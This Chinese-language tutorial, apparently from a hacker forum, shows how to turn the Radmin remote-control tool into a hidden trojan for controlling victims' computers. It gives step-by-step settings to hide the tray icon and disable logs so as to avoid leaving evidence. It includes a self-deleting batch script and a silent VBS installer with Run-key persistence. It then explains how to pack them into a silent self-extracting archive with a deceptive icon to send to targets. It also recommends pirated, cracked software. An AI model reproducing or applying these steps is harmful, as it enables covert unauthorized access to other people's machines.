radmin的使用教程 第一章 Radmin的初步设置 首先我们需要下载Radmin2.1版的安装程序,选择2.1版,因为它比较成熟可靠。由于是官方认可的软件,所以只要在百度搜索“Radmin2.1 破解”即可。
注意破解二字,要有注册码的!这里因为不想盗链,所以没直接给出下载地址,请大家自己搜索。
不推荐下载影子版。一是,影子版解压缩时可能会被杀毒软件查杀;二是,影子版是完成品,不适合初学者,毕竟自己多做些基础工作,可以打下扎实的基本功。 下载后,安装。最好你的系统是W2K,原因就不多说了。
安装完成后,选择Radmin的设置---选项。这时,你会看到弹出一个选项窗口。下面我们逐个介绍窗口中选项的功能。
首先是IP过滤。对新人而言,我是不建议设置IP过滤的,理由是尽量减少自己暴露的信息。所以,这个选项我们跳过。
其次是端口,默认的端口是4899。我们可以改一下,具体用哪个端口随自己喜好,可以随便编,但注意不要使用139,445,3389,4899这样声名在外的端口,即使肉鸡嫩,你就不怕别的老大抢了你的肉鸡??如果不懂哪些端口是做什么用的,可以发邮件给我,我会将详细的资料发给你。 然后就是隐藏托盘图表的选项了,不想被肉鸡的主人看见托盘有个不怀好意的图标在跟他奸笑的话,那就点上吧。
使用日志记录,日志文件名不要选。会留痕迹的哦! 连接确认也不要理它,价值不大。 选项OK了,我们再Radmin的设置---设置口令,就是密码。内容自己决定。
建议不要设置暴露自己信息的内容。呵呵 都设置好了,我们就开始安装服务吧。方法是Radmin的设置---安装服务。
Radmin3.2权限设置
1.Cytkk决定先去除Radmin在服务端运行后的任务栏标志。进入Radmin"服务端设置"中的"设置参数"(见图1),在"隐藏状态栏图标"前打上√,这样原本在服务端运行后会在状态栏有图标的弊端就剔除了。
2.然后根据自己的需要,更改连接端口号,设置成不常用的1986端口。
其它地方可不作修改(值得注意的是"日志"选项,千万不要因为错选"保留记录文件"从而留下"罪证"),点击"确定"退出。 3.点选"设置密码"来设置连接时的密码******。 4.一切设置妥当后,Cytkk先在自己机子上安装了服务(因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内)。待软件提示成功安装服务后,Cytkk打开注册表编辑器,找到:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 键值,点击"导出注册表"并保存成单独的r_server.reg文件,用记事本打开后,发现其中内容如下(根据设置的不同,参数会略有出入):Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]"NTAuthEnabled"=hex:00,00,00,00"Parameter"=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(这里是连接密码!其它信息不影响操作,所以不需要掌握)"Port"=hex:c2,07,00,00(连接服务端时用的端口)"Timeout"=hex:0a,00,00,00************************"LogFilePath"="c:\\logfile.txt""FilterIp"=hex:00,00,00,00"DisableTrayIcon"=hex:01,00,00,00(01表示隐藏系统右下角的图标,如改成00图标就会被显示) "AutoAllow"=hex:00,00,00,00"AskUser"=hex:00,00,00,00"EnableEventLog"=hex:00,00,00,00 5.最后Cytkk麻利地在桌面新建了一个setup.bat批处理文件,在里面添加如下脚本:@echo off***********************?(自动安装Radmin服务端)regedit.exe -s %SystemRoot%\system32\r_server.reg >nul (自动将r_server.reg内的配置信息导入目标机注册表)net start r_server >nul (启动r_server服务端服务)*******************************(删除信息文件)del %0 注意:文中代码后括号内的内容为注释,勿输入。
怎么用radmin3.2远程
一、radmin的配置 首先下载并解压Radmin。解压后有七个文件,打开“配置r_server”文件;点选“注册信息”,把sn文件中的注册码复制粘贴到对话框中确定;点击“设置密码”按钮进入设置密码窗口,为radmin设置不少于8位的密码后确定;点选“设置参数”按钮进入设置参数窗口,选中“隐藏状态栏图标”前的复选框,端口可以改也可以默认,然后确定。
最后点“安装服务”,确定后退出。
好,radmin的配置完毕。二、导出注册表信息 因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内,所以我们要导出注册表中的radmin信息。 打开注册表编辑器(开始->运行->输入regedit后回车),依次展开“HKEY_LOCAL_MACHINE\SYSTEM\Radmin”键值项,在“radmin”键值项上右击选择“导出”,保存为名为r_server.reg的文件。再依次展开“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”,在右边的窗口空白处右键单击,依次选择“新建”、“字符串值”,为新建的字符串起个名字,比如radmin,再在其上双击,在弹出的对话框的“数值数据”处填入“C:\WINDOWS\system32\r_server.exe”(不包括引号)后确定,然后导出radmin项,名称为qidong.reg 。
到此radmin的前期准备工作就做好了,下面来把它打造成完美木马。三、打造完美木马 打开记事本,输入以下代码:set ws=wscript.createobject("wscript.shell")ws.run "regedit.exe /s r_server.reg",0ws.run "regedit.exe /s qidong.reg",0ws.run "r_server.exe /install /silence",0ws.run "r_server.exe /start",0另存为yunxing.vbs。 把radmin32文件夹中的r_server.exe、AdmDll.dll、raddrv.dll三个文件以及r_server.reg、qidong.reg和刚才的yunxing.vbs共六个文件复制到同一目录下,然后同时选中它们,用鼠标选中这六个文件,单击鼠标右键,选择“添加到压缩文件”(前提是你安装了WINRAR)。
在弹出的对话框的“常规”选项卡的“存档选项”框中选中“创建自释放格式档案文件(X)”前的复选框,然后切换到“高级”选项卡,点选“SFX选项(X)”进入高级自释放选项设置:在这里的“常规”选项卡中的释放路径一栏处填入“C:\WINDOWS\system32”(不包括引号),在“释放后运行”里填入yunxing.vbs(注意填写文件扩展名)。再切换到“模式”选项卡,缄默模式设置成“全部隐藏”,覆盖方式设置成“覆盖所有文件”。切换到“文字和图标”选项卡,在“自定义SFX”框中点“浏览”选择一个迷惑性的图标。
最后连续点击两次“确定”完成收尾工作。好,完美的木马已经打造完成,把这个木马传给你要控制的人,你就可以玩远程控制了。四、radmin的使用 这里简单的说一下radmin的使用方法:打开Radmin.exe,选择“连接选项”->“连接到……”,在“连接类型”中选择你想要的功能,在“所连接的IP地址或DNS”中输入服务端的IP地址,然后点击“确定”,在弹出的对话框中输入你原先设置的密码,确定后就连接成功了。
注:本文以radmin(影子汉化版)为例。
标签: radmin3.5